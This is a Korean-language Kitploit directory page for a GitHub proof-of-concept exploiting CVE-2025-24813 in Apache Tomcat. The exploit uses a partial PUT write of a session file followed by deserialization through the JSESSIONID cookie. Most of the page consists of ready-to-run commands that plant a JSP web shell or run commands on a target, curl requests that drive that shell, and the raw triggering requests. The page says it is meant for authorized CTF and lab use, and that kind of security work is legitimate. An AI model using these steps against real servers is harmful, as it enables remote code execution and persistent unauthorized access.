Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24813 — Java CVE에 맞는 페이로드 | Kitploit
도구/GitHubGitHub/loufa0/cve-2025-24813
Vulnerability ScannersExploitationWeb SecurityCTFLearning & EducationLabs & Practice
GitHubloufa0/cve-2025-24813

CVE-2025-24813

Java CVE에 맞는 페이로드

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24813 Tomcat PoC

허가된 CTF/랩 환경을 위한 PoC입니다. Tomcat 세션 파일의 부분 PUT 쓰기를 통해 CVE-2025-24813을 악용한 후 JSESSIONID로 역직렬화를 트리거합니다.

사전 요구 사항

  • Python 3
  • Python requests 모듈
  • Java JDK (java 및 javac)
  • 이 폴더에 포함된 commons-collections-3.2.1.jar 파일

ysoserial은 필요하지 않습니다.

파일

  • poc_cve_2025_24813.py: 생성, 업로드 및 트리거를 자동화하는 Python 래퍼.
  • GenerateTomcatSessionPayload.java: CommonsCollections 가젯을 포함하는 유효한 Tomcat 세션을 생성합니다.
  • commons-collections-3.2.1.jar: 가젯 의존성.
  • sh.jsp: --drop-shell로 배포되는 선택적 JSP 셸.

사용법

기본 웹루트 /opt/tomcat/webapps/ROOT에 JSP 셸을 배치합니다:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

셸을 배치하지 않고 직접 명령을 실행합니다:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

웹루트가 다른 경우:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

JAR을 다른 위치로 옮긴 경우 해당 경로를 지정하십시오:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

익스플로잇 이후

--drop-shell이 성공하면:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

대상 측 조건

  • 취약한 Tomcat 버전.
  • DefaultServlet 쓰기 가능, 일반적으로 readonly=false.
  • 부분 PUT 지원.
  • PersistentManager 및 FileStore를 통한 영구 세션.
  • 서버 측에서 사용 가능한 가젯 체인, 여기서는 commons-collections.

업로드 시 예상되는 동작은 종종 다음 요청에 대한 HTTP 409 Conflict입니다:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

그런 다음 다음을 사용하여 역직렬화가 트리거됩니다:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
도구 다운로드